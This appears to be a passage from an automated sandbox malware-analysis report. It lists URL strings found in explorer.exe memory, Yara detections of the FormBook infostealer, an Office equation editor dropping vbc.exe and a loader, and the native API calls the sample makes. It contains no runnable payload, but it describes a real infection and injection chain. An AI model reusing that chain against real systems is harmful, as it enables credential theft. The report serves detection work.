          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2158689083.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000006.00000000.2157630203.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2158023597.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.2158689083.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2157630203.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2157511014.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2157630203.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
          Source: C:\Users\Public\vbc.exe Code function: 4_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match File source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 4.2.vbc.exe.510000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.2.vbc.exe.510000.3.unpack, type: UNPACKEDPE
          Source: Yara match File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.510000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.510000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.510000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.510000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader2[1].exe
          Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\control.exe Memory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\control.exe Memory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe Code function: 5_2_004181D0 NtCreateFile,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_00418280 NtReadFile,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_00418300 NtClose,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_0041827B NtCreateFile,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_004182FD NtClose,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_004183AB NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_009700C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_00970048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_00970078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_009707AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_0096F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_0096F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_0096FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_0096FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_0096FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_0096FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_0096FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_0096FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_0096FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_0096FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_0096FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_0096FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_0096FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_009710D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_00970060 NtQuerySection,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_009701D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_0097010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_00971148 NtOpenThread,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_0096F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_00971930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_0096F938 NtWriteFile,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_0096FAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_0096FA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_0096FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_0096FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_0096FB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_0096FC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_00970C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_0096FC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exe Code function: 5_2_00971D80 NtSuspendThread,
